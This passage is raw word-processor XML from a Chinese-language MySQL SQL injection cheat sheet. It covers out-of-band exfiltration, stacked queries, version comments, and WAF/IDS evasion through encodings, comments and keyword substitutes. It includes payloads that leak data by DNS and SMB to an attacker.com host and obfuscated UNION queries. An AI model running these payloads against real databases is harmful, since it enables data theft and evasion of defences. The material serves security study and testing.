              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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INTO OUTFILE 必须是查询中的最后一个语句。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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无法对路径名进行编码，因此需要引号。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DUMPFILE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‘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>文件路径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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5662" w:type="dxa"/>
            <w:vMerge w:val="continue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outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc4826_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>带外通道</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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DNS请求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LOAD_FILE(CONCAT('\\\\foo.',(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>SELECT MID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(version(),1,1)),'.attacker.com\\'));</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="200"/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10"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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SMB请求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' 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1=1 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INTO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OUTFILE '\\\\attacker\\SMBshare\\output.txt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67" w:name="_Toc1551_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>堆叠查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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MySQL可以进行堆栈查询，具体取决于PHP应用程序使用哪个驱动程序与数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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该 PDO_MYSQL 驱动程序支持堆叠查询。该 MySQLi （改进扩展）驱动程序还支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>持通过堆查询 multi_query() 功能。</w:t>
      </w:r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68" w:name="_Toc5217_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL特定的代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/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MySQL允许您指定感叹号后的版本号。</w:t>
      </w:r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仅当版本大于或等于指定的版本号时，才会执行注释中的语法。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 xml:space="preserve">UNION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>SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/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0,null--+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返回版本，它使用一个有2列的UNION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SELECT 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/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);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演示了如何绕过WAF / IDS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69" w:name="_Toc3661_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模糊与混淆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/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420" w:firstLineChars="200"/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允许的中介字符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以下字符可用作空格</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="16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"/>
        <w:gridCol w:w="12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 New" w:hAnsi="Courier New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09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水平标签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0A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新队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0B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垂直标签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0℃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新的一页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0D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回程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A0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不间断的空</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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20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  <w:lang w:val="en-US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空</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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格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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>括号也可用于避免使用空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(列)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(表))</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="5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7"/>
        <w:gridCol w:w="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 New" w:hAnsi="Courier New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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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)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420" w:firstLineChars="200"/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AND / OR 后允许的中介字符</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="8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7"/>
        <w:gridCol w:w="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 New" w:hAnsi="Courier New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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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 w:eastAsiaTheme="minorEastAsi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2B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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2D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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7E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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7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ourier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ourier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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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@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420" w:firstLineChars="200"/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用注释混淆</w:t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某些函数也可以使用注释和空格进行混淆。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>SELECT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>/**/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列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>/**/</w:t>
            </w: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>FROM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/**/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表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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/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注释可用于分解查询以欺骗WAF / IDS并避免检测。通过使用＃或 - 后跟换行符，我们可以将查询拆分为单独的行。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vertAlign w:val="baseline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1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>#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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">AND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0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>--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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>UNION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"># I am a comment!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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SELECT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 xml:space="preserve">@tmp:=table_name x </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>FROM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">--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 xml:space="preserve">`information_schema`.tables </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">LIMIT 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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"># 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420" w:firstLineChars="200"/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编码</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1784" w:tblpY="295"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="84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0"/>
        <w:gridCol w:w="6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 w:eastAsia="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>网址编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6253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ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SELECT %74able_%6eame FROM information_schema.tables;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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>双重URL编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6253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ourier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SELECT %2574able_%256eame FROM information_schema.tables;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/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unicode编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6253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ourier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SELECT %u0074able_%u6eame FROM information_schema.tables;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6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Courier New" w:hAnsi="Courier New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/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>无效的十六进制编码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ASP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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6253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ourier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SELECT %tab%le_%na%me FROM information_schema.tables;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编码注射有时可用于WAF / IDS规避。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0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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避免关键字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如果IDS / WAF已阻止某些关键字，则可以通过其他方式绕过它而不使用编码。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="57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0"/>
        <w:gridCol w:w="40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ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>information_schema.tables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textAlignment w:val="center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hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>空格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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>information_schema . tables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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>反引号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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>`information_schema`.`tables`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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New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/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/*! 代码 */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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>/*!information_schema.tables*/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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New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Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>替代名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>information_schema.partitions </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>information_schema.statistics </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>information_schema.key_column_usage </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>information_schema.table_constraints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70" w:name="_Toc23508_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>操作符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="6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3F3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8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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_and"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  <w:u w:val="none"/>
              </w:rPr>
              <w:t>AND , &amp;&amp;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逻辑和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"http://dev.mysql.com/doc/refman/5.6/en/assignment-operators.html" \l "operator_assign-equal"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=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分配值（作为语句的一部分，或作为语句中子句的一部分 ）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"http://dev.mysql.com/doc/refman/5.6/en/set-statement.html"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 SET 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Style w:val="12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SET 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"http://dev.mysql.com/doc/refman/5.6/en/update.html"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UPDATE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"http://dev.mysql.com/doc/refman/5.6/en/assignment-operators.html" \l "operator_assign-value"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:=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分配值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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_between"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BETWEEN ... AND ...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检查值是否在值范围内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"http://dev.mysql.com/doc/refman/5.6/en/cast-functions.html" \l "operator_binary"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BINARY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将字符串转换为二进制字符串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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-and"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&amp;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按位AND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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-invert"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~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反转位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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-or"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|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按位OR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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-xor"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^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按位异或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"http://dev.mysql.com/doc/refman/5.6/en/control-flow-functions.html" \l "operator_case"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CASE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案例运营商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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_div"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DIV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整数除法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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_divide"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/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分部运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_equal-to"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&lt;=&gt;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NULL-safe等于运算符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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_equal"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=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平等的运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_greater-than-or-equal"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&gt;=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大于或等于运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_greater-than"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&gt;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大于运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is-not-null"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IS NOT NULL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NOT NULL值测试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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is-not"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IS NOT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针对布尔值测试值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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is-null"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IS NULL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NULL值测试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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is"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IS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针对布尔值测试值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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_left-shift"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&lt;&lt;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左移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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_less-than-or-equal"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&lt;=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小于或等于运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_less-than"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&lt;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不到运营商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"http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" \l "operator_like"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LIKE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简单的模式匹配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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_minus"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-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减号运算符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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_mod"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% or MOD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模数运算符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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_not-between"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NOT BETWEEN ... AND ...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检查值是否不在值范围内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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_not-equal"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!= , &lt;&gt;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不等于运营商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"http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" \l "operator_not-like"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NOT LIKE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简单模式匹配的否定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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_not-regexp"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NOT REGEXP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REGEXP的否定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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_not"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NOT , !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否定价值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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_or"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|| , OR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逻辑或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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_plus"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+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加法运算符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3F3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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_regexp"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REGEXP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使用正则表达式匹配模式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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_right-shift"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&gt;&gt;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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_regexp"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RLIKE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REGEXP的同义词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"http://dev.mysql.com/doc/refman/5.6/en/string-functions.html" \l "operator_sounds-like"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SOUNDS LIKE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比较声音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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_times"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*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乘法运算符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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_unary-minus"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-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更改参数的符号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8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instrText xml:space="preserve"> HYPERLINK "http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_xor" \t "https://www.websec.ca/kb/_blank" </w:instrTex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sz w:val="18"/>
